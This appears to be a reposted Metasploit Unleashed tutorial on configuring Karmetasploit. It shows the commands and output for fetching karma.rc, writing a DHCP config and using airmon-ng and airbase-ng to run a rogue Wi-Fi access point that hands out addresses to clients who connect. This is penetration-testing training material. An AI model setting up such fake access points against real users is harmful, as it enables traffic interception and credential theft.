原理分析:http://www.freebuf.com/articles/77055.html
转官方说明:https://www.offensive-security.com/metasploit-unleashed/karmetasploit-configuration/
There is a bit of setup required to get Karmetasploit up and going. The first step is to obtain the run control file for Karmetasploit:
root@kali:~# wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt
--2015-04-03 16:17:27-- https://www.offensive-security.com/downloads/karma.rc
Resolving www.offensive-security.com (www.offensive-security.com)... 198.50.176.211
Connecting to www.offensive-security.com (www.offensive-security.com)|198.50.176.211|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1089 (1.1K) [text/plain]
Saving to: `karma.rc' 100%[======================================>] 1,089 --.-K/s in 0s
2015-04-03 16:17:28 (35.9 MB/s) - `karma.rc' saved [1089/1089]
Having obtained that requirement, we need to set up a bit of the infrastructure that will be required. When clients attach to the fake AP we run, they will be expecting to be assigned an IP address. As such, we need to put a DHCP server in place. Let’s configure our ‘dhcpd.conf’ file.
root@kali:~# cat /etc/dhcp3/dhcpd.conf
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
Then we need to install a couple of requirements.
root@kali:~# gem install activerecord sqlite3-ruby
Successfully installed activerecord-2.3.2
Building native extensions. This could take a while...
Successfully installed sqlite3-ruby-1.2.4
2 gems installed
Installing ri documentation for activerecord-2.3.2...
Installing ri documentation for sqlite3-ruby-1.2.4...
Installing RDoc documentation for activerecord-2.3.2...
Installing RDoc documentation for sqlite3-ruby-1.2.4...
Now we are ready to go. First off, we need to restart our wireless adapter in monitor mode. To do so, we first stop the interface, then use airmon-ng to restart it in monitor mode. Then, we utilize airbase-ng to start a new network.
root@kali:~# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
root@kali:~# airmon-ng stop ath0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
root@kali:~# airmon-ng start wifi0
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
5636 NetworkManager
5641 wpa_supplicant
5748 dhclient3
Interface Chipset Driver
wifi0 Atheros madwifi-ngError for wireless request "Set Frequency" (8B04) :
SET failed on device ath0 ; No such device.
ath0: ERROR while getting interface flags: No such device
ath1 Atheros madwifi-ng VAP (parent: wifi0)
root@kali:~# airbase-ng -P -C 30 -e "U R PWND" -v ath1
For information, no action required: Using gettimeofday() instead of /dev/rtc
22:52:25 Created tap interface at0
22:52:25 Trying to set MTU on at0 to 1500
22:52:25 Trying to set MTU on ath1 to 1800
22:52:25 Access Point with BSSID 00:1A:4D:49:0B:26 started.
Airbase-ng has created a new interface for us, at0. This is the interface we will now utilize. We will now assign ourselves an IP address and start up our DHCP server listening on our new interface.
root@kali:~# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
root@kali:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 0 leases to leases file.
Listening on LPF/at0/00:1a:4d:49:0b:26/10.0.0/24
Sending on LPF/at0/00:1a:4d:49:0b:26/10.0.0/24
Sending on Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.
root@kali:~# ps aux | grep dhcpd
dhcpd 6490 0.0 0.1 3812 1840 ? Ss 22:55 0:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
root 6493 0.0 0.0 3232 788 pts/0 S+ 22:55 0:00 grep dhcpd